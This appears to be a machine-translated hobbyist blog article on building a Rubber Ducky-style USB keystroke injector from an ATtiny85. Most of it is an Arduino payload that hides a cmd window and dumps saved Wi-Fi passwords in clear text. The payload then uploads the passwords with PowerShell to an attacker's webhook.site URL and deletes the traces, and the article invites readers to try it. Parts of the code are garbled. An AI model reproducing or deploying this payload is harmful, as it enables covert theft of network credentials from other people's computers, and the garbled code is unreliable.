Hack WiFi Password in 20 seconds with ATtiny85

In this article, which is nominated to be the most interesting of our articles about ATtiny, we are actually making a Rubber Ducky, to learn about Rubber Ducky, Mr. We recommend that you take a look at our article about the technologies used in the robot.

In fact, you can do all the operations here with any microprocessor with the "USB Interface" protocol. In summary, we will connect ATtiny85 to our computer with a "keyboard" view and run some command system scripts, although the descriptions here are for educational purposes, good lessons can be learned from this article to avoid such dangers. In addition, connecting the ATtiny85 you use directly via USB (micro USB or Jumper connections) can make your job a little easier.

wifi password hack
ATtiny85 USB Model

As with any ATtiny content, you will use Arduino IDE, first you need to install ATtiny libraries on Arduino IDE and install the necessary drivers on your computer, you can access detailed information about installation by reviewing our previous ATtiny articles.

There is a lot of malicious code that creates for ATtiny85, so to avoid such dangers, it is worth knowing these payloads. In this article you will use the Wi-Fi password stealer payload created by the user MTK911 GitHub, but as you can see in the image you can try other payloads as well.

wifi password hack

The extent of the danger is a little more illustrated by the extent of the danger that some payloads do not require admin powers.

Program ID

/*  Following payload will grab saved Wifi password and will send them to your hosted webhook and hide the cmd windows by using technique mentioned in hak5darren  rubberducky wiki -- Payload hide cmd window [https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---hide-cmd-window]*/#include"DigiKeyboard.h"#define KEY_DOWN 0x51  // Keyboard Down Arrow#define KEY_ENTER 0x28  /Return/Return/Enter Keyvoidvoid  setup() {
  pinMode(1, OUTPUT); //LED on Model A
}

void loop() {
   
DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
 
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible
  DigiKeyboard.delay(500);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT); //Menu
  DigiKeyboard.sendKeyStroke(KEY_M); //goto Movefor(int i =0; i <  100; i++)
    {
      DigiKeyboard.sendKeyStroke(KEY_DOWN);
    }
  DigiKeyboard.sendKeyStroke(KEY_ENTER); //Detach from scrolling
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cd %temp%"); //going to temporary
  DigiKeyboard.delay(500);
  DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary
  DigiKeyboard.delay(500);
  DigiKeyboard.println("powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file is temporary
  DigiKeyboard.delay(500);
  DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS");</ADD-WEBHOOK-ADDRESS-HERE> //Submitting all passwords on hook
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("del Wi-* /s /f /q"); //cleaning up all the mess
  DigiKeyboard.delay(100);
  DigiKeyboard.println("exit");
  DigiKeyboard.delay(100);
  
digitalWrite(1, HIGH); //turn on led when program finishes
  DigiKeyboard.delay(90000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
  
}










  

The program code actually introduces ATtiny85 as keyboard input to the computer, so security programs cause an open data breach if antiviruses are not prepared for this attack. Connected as a keyboard input, as if under human control, powershell opens a command line, pulls data from the part where WiFi passwords are held, then transfers this WiFi data to the "unique URL" dedicated to you through the webhook.site we often use in IoT operations, if you compile and test this program on your ATtiny85, you will know exactly what we are talking about during operation.

You can use ATtiny85's EPROM to store WiFi data, or you can record this data by installing a different EPROM integration, SD Card module, but here you can get the magic of webhook to see how fast and effective this attack is.

Sample Webhook Unique URL

wifi password hack

Each time you log in, it will give you a different unique URL, you can save and use the address you want, remember to follow which URL you enter in the required part of the program.